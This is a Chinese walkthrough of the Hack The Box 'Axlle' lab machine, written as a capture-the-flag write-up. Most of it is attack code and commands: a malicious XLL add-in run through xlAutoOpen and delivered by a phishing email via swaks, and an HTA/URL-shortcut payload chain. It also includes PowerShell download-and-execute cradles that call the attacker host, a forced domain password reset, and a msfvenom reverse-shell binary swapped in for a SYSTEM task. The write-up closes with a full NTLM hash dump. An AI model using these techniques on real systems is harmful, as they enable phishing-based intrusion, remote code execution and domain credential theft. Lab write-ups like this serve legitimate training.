基本信息

端口扫描

25,80,和其他一些常规域端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
$ nmap -sC -sV 10.10.11.21
Starting Nmap 7.95 ( https://nmap.org ) at 2024-06-24 13:28 CST
Nmap scan report for 10.10.11.21
Host is up (0.087s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Axlle Development
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-24 05:22:27Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: AXLLE
|   NetBIOS_Domain_Name: AXLLE
|   NetBIOS_Computer_Name: MAINFRAME
|   DNS_Domain_Name: axlle.htb
|   DNS_Computer_Name: MAINFRAME.axlle.htb
|   DNS_Tree_Name: axlle.htb
|   Product_Version: 10.0.20348
|_  System_Time: 2024-06-24T05:22:36+00:00
| ssl-cert: Subject: commonName=MAINFRAME.axlle.htb
| Not valid before: 2024-05-19T11:25:03
|_Not valid after:  2024-11-18T11:25:03
|_ssl-date: 2024-06-24T05:23:15+00:00; -6m55s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: MAINFRAME; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: -6m55s, deviation: 0s, median: -6m55s
| smb2-time:
|   date: 2024-06-24T05:22:39
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.97 seconds

80

软件公司官网,维护页面,页面信息显示有任何问题邮件发excel格式,并且已禁用宏:

XLL to gideon.hamill

根据页面信息以及开放的smtp端口,应该就是发钓鱼邮件,又因为已禁用宏,这种场景以及机器名称提示,xll:

编译生成xll,发送钓鱼邮件:

1
2
3
x86_64-w64-mingw32-gcc -fPIC -shared -o xll.xll xll.c -luser32

swaks --to accounts@axlle.htb --from miao@miao.com --body "Miao" --header "Subject: Miaomiao" --attach @xll.xll --server 10.10.11.21

发送后等待触发执行,得到gideon.hamill:

xll.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include <windows.h>

__declspec(dllexport) void __cdecl xlAutoOpen(void);

void __cdecl xlAutoOpen() {
    WinExec("powershell -e JABjAGxxxxxxAKAApAA==", 1);
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

HTA to dallon.matrix

常规枚举,可以在hMailServer中发现一封邮件,里面提示会自动访问C:\inetpub\testing目录下的any web shortcuts:

HTA

这里可以用HTA,URL跳转到HTA,HTA执行代码:

1
2
3
powershell -exec bypass -c "wget http://10.10.14.13:7777/shell.url -O shell.url"

~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/smbserver.py -smb2support miao .

打到dallon.matrix:

shell.url

1
2
[InternetShortcut]
URL=file://10.10.14.13/miao/shell.hta

shell.hta

1
2
3
4
5
6
7
8
9
10
11
<html>
<head>
<script language="jscript">
        var c = "powershell -e JABjAXXXXXXXKAApAA=="; 
        new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>

user flag

dallon.matrix用户桌面:

信息

bloodhound信息分析:

1
2
3
4
IEX ((new-object net.webclient).downloadstring('http://10.10.14.13:7778/adPEAS.ps1'))
invoke-adpeas

copy axlle.htb_20240623225644_BloodHound.zip \\10.10.14.13\miao

dallon.matrix在WEB DAVS组中,能够强制修改JACOB.GREENY和BAZ.HUMPHRIES的密码:

这两个用户都是remote management组成员,任意修改一个即可:

JACOB.GREENY

修改JACOB.GREENY密码后登录:

1
2
3
4
5
6
IEX ((new-object net.webclient).downloadstring('http://10.10.14.13:7778/PowerView.ps1'))

$pass = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass

evil-winrm -i 10.10.11.21 -u Jacob.Greeny -p 'Password123!'

App Devs

Jacob.Greeny也是App Devs组成员,前面也可以看到C盘根目录的App Development目录:

readme中提到standalonerunner.exe以system身份自动运行

1
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**

而我们的App Devs用户组对其有写权限:

standalonerunner.exe to root

这里预期应该是lolbas,但非预期可以直接替换standalonerunner.exe然后等待执行:

非预期替换

1
2
3
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=4444 -f exe -o miao.exe

wget http://10.10.14.13:7777/miao.exe -o standalonerunner.exe

root flag

1
evil-winrm -i 10.10.11.21 -u Administrator -p 'Xj!#$12KlMn'

hashdump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# meterpreters creds_all
Administrator  axlle.htb  Xj!#$12KlMn

# 因为前面改了Jacob.Greeny的密码,所以重置后再dump
~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/secretsdump.py -just-dc-ntlm Administrator:'Xj!#$12KlMn'@10.10.11.21

Administrator:500:aad3b435b51404eeaad3b435b51404ee:6322b5b9f9daecb0fefd594fa6fafb6a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6d92f4784b46504cf3bedbc702ac03fe:::
axlle.htb\david.brice:1109:aad3b435b51404eeaad3b435b51404ee:0279f2a1f290ff139458088afb45fa3f:::
axlle.htb\frankie.rose:1110:aad3b435b51404eeaad3b435b51404ee:80c10c678c9b31e2091065c90519e529:::
axlle.htb\brad.shaw:1111:aad3b435b51404eeaad3b435b51404ee:9cefad58a9a2188687922a6cc10485a3:::
axlle.htb\samantha.jade:1112:aad3b435b51404eeaad3b435b51404ee:8047ec8cda0666f4e1c1be0ddc2d0378:::
axlle.htb\gideon.hamill:1113:aad3b435b51404eeaad3b435b51404ee:aa753e07e1fd47a45e0ecb3a0cc70dab:::
axlle.htb\xavier.edmund:1114:aad3b435b51404eeaad3b435b51404ee:9ecaa82cc22e0e1534493a03276dc02b:::
axlle.htb\emily.cook:1115:aad3b435b51404eeaad3b435b51404ee:b35775e6e9d3af6c0dcf33cef162986d:::
axlle.htb\brooke.graham:1116:aad3b435b51404eeaad3b435b51404ee:bcd1044566a9fb7fe130bdd5bcce7db1:::
axlle.htb\trent.langdon:1117:aad3b435b51404eeaad3b435b51404ee:a4bbfacd030508d12f3a203bbab8b1f8:::
axlle.htb\matt.drew:1118:aad3b435b51404eeaad3b435b51404ee:eb116285721b66b71d98803716b94616:::
axlle.htb\jess.adams:1119:aad3b435b51404eeaad3b435b51404ee:933d10a14def0ed5ffbd708092d92e4d:::
axlle.htb\jacob.greeny:1120:aad3b435b51404eeaad3b435b51404ee:805175c3d08be3027ed63e88a944f736:::
axlle.htb\simon.smalls:1121:aad3b435b51404eeaad3b435b51404ee:d14ddd0880870e9d7fcb442653b6183e:::
axlle.htb\dan.kendo:1122:aad3b435b51404eeaad3b435b51404ee:3fa7f786ca68123db7fdef522cb93a22:::
axlle.htb\lindsay.richards:1123:aad3b435b51404eeaad3b435b51404ee:71d62e4384f2e9b92169a10a29539b2d:::
axlle.htb\calum.scott:1124:aad3b435b51404eeaad3b435b51404ee:35a376bb58095b4a559fbceccdb01364:::
axlle.htb\dallon.matrix:1125:aad3b435b51404eeaad3b435b51404ee:124a4a99bf67ca4b04e2266f967daa64:::
axlle.htb\baz.humphries:1126:aad3b435b51404eeaad3b435b51404ee:ecfc37e6e4797f9ae97b61f0265c0561:::
MAINFRAME$:1000:aad3b435b51404eeaad3b435b51404ee:011a082f7649082b7fe7521c2ae2bb2a:::

参考资料